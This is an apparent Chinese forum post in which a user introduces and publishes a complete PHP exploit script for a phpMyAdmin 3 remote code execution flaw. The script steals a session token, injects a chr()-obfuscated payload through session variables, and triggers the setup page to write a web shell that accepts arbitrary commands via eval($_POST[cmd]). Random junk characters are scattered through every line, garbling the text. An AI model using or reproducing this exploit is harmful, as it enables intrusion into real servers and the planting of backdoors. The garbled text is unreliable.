最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
! V0 f" Z; Z4 Y: _) N, L& i! q2 z4 P- I7 I% K/ q) Y) n4 ^
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。$ T: A/ s) E0 l' o7 G& y$ g
5 F1 |# \5 F; |首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
4 i: T: H2 {$ {) v$ g一是session.auto_start = 1;3 h9 |% A9 E% n2 L+ _8 w& u
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。. ]3 A3 t. m' I1 U& H! O" J
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
5 y, g. d% ?7 M' X7 x5 z1 e" @( s/ D9 [1 ]: r
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
/ A. y; f: x2 H0 F& S6 K
( r0 b+ [$ e" R6 ?. e: L' C于是写了这个php版本的exp,代码如下:
3 c8 x% L2 {- ]( ] I
* N1 s9 c# }" C& q& K3 H#!/usr/bin/php
2 h H- P. o3 S( J<?php4 O" p" b( B: n5 s9 s& X- ^: h
print_r('
6 b, |5 ]7 v! t3 P) K1 p$ f+---------------------------------------------------------------------------+6 d6 `- W/ n# t* j6 k: z
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
: F6 e, G( E; @4 M4 e4 dby oldjun(www.oldjun.com)2 u3 o% @- B, I, Q1 K7 h
welcome to www.t00ls.net
3 D& D a. N5 h' ^" {( L* [mail: oldjun@gmail.com+ s# _: _7 Z4 n6 C
Assigned CVE id: CVE-2011-25053 p6 a$ u3 p# G, G0 T
+---------------------------------------------------------------------------+
' R; T; {3 K. }( ~* ~5 s. h');
8 Y: u P( P" R% w
; T9 T0 n) k( o/**0 W" u: t/ O6 f( Z
* working when the directory:"config" exists and is writeable.7 v. d1 o' h. Q3 e1 B
**/
2 }/ k6 P/ X% n. D4 n
1 [8 ~( B( V7 N4 I& d, i4 sif ($argc < 3) {: B- F8 Z8 e% D
print_r('+ L1 z# \3 p3 ?' P
+---------------------------------------------------------------------------+
$ s' E1 |4 R' JUsage: php '.$argv[0].' host path
# J @8 x0 K1 I; Vhost: target server (ip/hostname)3 q+ V* g5 `/ I: K [6 V1 A$ U- S! u
path: path to pma3
5 ~+ `, Q4 y8 c( x. BExample:
. z! z2 J" z1 }. d0 Cphp '.$argv[0].' localhost /pma/4 R. W9 h1 N' G3 O& J; v7 O$ {& L
+---------------------------------------------------------------------------+4 j1 ]" q; Y2 M" G. ]7 z
');
( u W7 R% f# f5 Z" c exit;
. S) t8 [" q8 s5 K) w4 N/ ~}( f; v6 M1 ~3 j/ }9 D
$ H5 k1 _" n* j0 K( g/ ^" H! S7 F
$host = $argv[1];
6 _7 r p+ L/ P: k- B- }+ k$path = $argv[2];3 V5 Z& e6 D: R
4 s9 x5 a( ^8 S* m4 J1 w, w; I( I& P
/**, L8 t, e2 e2 f4 ?5 g
* Try to determine if the directory:"config" exists
" i; s( j3 o+ {- n7 c: R' a: n**/# n' e& ^+ o. C8 N; i0 F
echo "[+] Try to determine if the directory:config exists....\n";$ [: R& E# m, h$ T7 X6 @
$returnstr=php_request('config/');% t Q4 E2 m _# A" E7 a: F, \
if(strpos($returnstr,'404')){
$ i: B: p& }) y- q exit("[-] Exploit Failed! The directory:config do not exists!\n");9 M# c4 }1 I' ]: v
}
& {9 ^+ ?# m+ ^- K- G: e( C
" `1 b- U: k8 A- l/**
% j+ [% k" x6 b) i' s * Try to get token and sessionid8 K. ~' H) W1 m5 ?$ O" y4 t
**/
; V% @. f& {( \* V/ decho "[+] Try to get token and sessionid....\n";* Q3 ~3 u% g- b3 r7 Y! B( v
$result=php_request('index.php');
" e& G9 E% U3 W5 x: _* Jpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);& l% v, F: D3 z9 I% c
$token=$resp[3];
; a- m5 [" W5 R# }$sessionid=$resp[1];% |( {: \" o1 A' }' j- Q- x& N6 N
if($token && $sessionid){" ^( t, N8 {$ V! z. n9 N( K7 ^5 K
echo "[+] token token\n";
4 g4 S/ `2 V& o' y+ j8 l( r: M6 ? echo "[+] Session IDsessionid\n";
& F0 \) F. V/ w: m! Y}else{+ Q6 Q! X( J3 {. s* _" V+ V
exit("[-] Can't get token and Session ID,Exploit Failed!\n");
& v% h# k* b# a! B/ t. a9 N}
@* W8 l& v0 E! U- G$ k: P1 }0 W$ _! A
/**$ t) r: [7 Y! y/ u) `9 F
* Try to insert shell into session0 e/ K9 `$ u/ p i' E" ]
**/
& ?* H7 `, K8 R: _' M% B6 gecho "[+] Try to insert shell into session....\n";
7 z) D6 r* [0 yphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.$ u) N, g+ }0 n7 D7 [
9 j! p" B! O% }7 ?* a: |, B/**
' E$ K3 D; Z( f: j, f9 a( B * Try to create webshell
* x! {1 p8 B, E4 l/ H* {) B**/6 r. W |0 k C# h: p a
echo "[+] Try to create webshell....\n";3 r. K- } ^* Y3 ^
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
$ |, z/ d& j2 Z' @" ^4 K/**
+ M+ i. k$ |- _% }2 G * Try to check if the webshell was created successfully+ _6 g3 Y3 }0 ~6 @
**/; G8 P: e4 m$ j k& c- E- ^
echo "[+] Try to check if the webshell was created successfully....\n";
& ~+ v; X( }0 o# p' p$content=php_request('config/config.inc.php');
* p, B1 L4 z* A5 F3 _if(strpos($content,'t00ls')){2 b" ^0 l- e# g: d* V7 [" T" o
echo "[+] Congratulations! Expoilt successfully....\n";
- S+ A- n$ I* \. k( w6 c- ~! k echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
/ u6 _! }. K [( h4 m}else{- ^- G( [& k! ]6 G) y' L. v: ^
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");- i1 y0 N, W& ~, C0 S
}
4 F) G8 p K6 N4 x4 U9 `% N! H2 y6 ~- d1 o
function php_request($url,$data='',$cookie=''){
* ]9 j% e a4 I, S: L global $host, $path;1 u5 \$ x9 N; K
8 V h5 q) {) k t3 q $method=$data?'POST':'GET';8 [! b0 z) D% \1 A
- J+ e& J: M5 ]* i $packet = $method." ".$path.$url." HTTP/1.1\r\n";
& g6 |1 b/ |8 t% e7 | $packet .= "Accept: */*\r\n";
& B. }* K) R2 h7 @9 |0 m $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";# {$ ^8 |& _' L+ L i3 O$ L
$packet .= "Host: $host\r\n";9 b1 A) Z( ~! k: c$ H _
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";) _) z/ f# f6 e
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
6 J7 V. d6 l. Q# ]4 d* t $packet .= $cookie?"Cookie: $cookie\r\n":"";
1 H L u# c) \: T; O6 r2 T8 k# w1 A $packet .= "Connection: Close\r\n\r\n";* `8 d3 O8 `% Y% l6 S8 A" U; I
$packet .= $data?$data:"";
6 k' P: z5 N& C( [' |9 E8 u7 R+ Q- p2 ]* p6 D. H8 M4 H4 p
$fp = fsockopen(gethostbyname($host), 80);
" j) j& S @: p8 u: i9 d* Q if (!$fp) {
2 o$ t. B/ Z, B6 F echo 'No response from '.$host; die;: b1 M- M) \& H4 b) d: ?
}% k6 [) N4 S& i- O# `
fputs($fp, $packet);
" P5 z4 `& }3 c& B# k" O: N! S
. @8 C2 R' R; U1 T $resp = '';
% z( U+ K7 r7 u/ M$ `& A* V. R. I0 a
6 a1 E- u; }3 z- P2 b+ f/ s) ? while ($fp && !feof($fp))
9 d- _/ s! s" R4 D- @5 }+ | $resp .= fread($fp, 1024);6 T+ L) n8 k0 B! K
( O1 B* u* o% C2 B return $resp;
# v+ b! t* O- E3 I- i}
" j1 W( C' v$ T# K1 ?) d/ N. z5 M + [: v) ?, Q6 N$ Y, ] _( S% ^
?>
; ^% t8 z1 n! v9 L3 G3 N: h. |
发表于 2013-2-21 09:13:03
收藏
支持
反对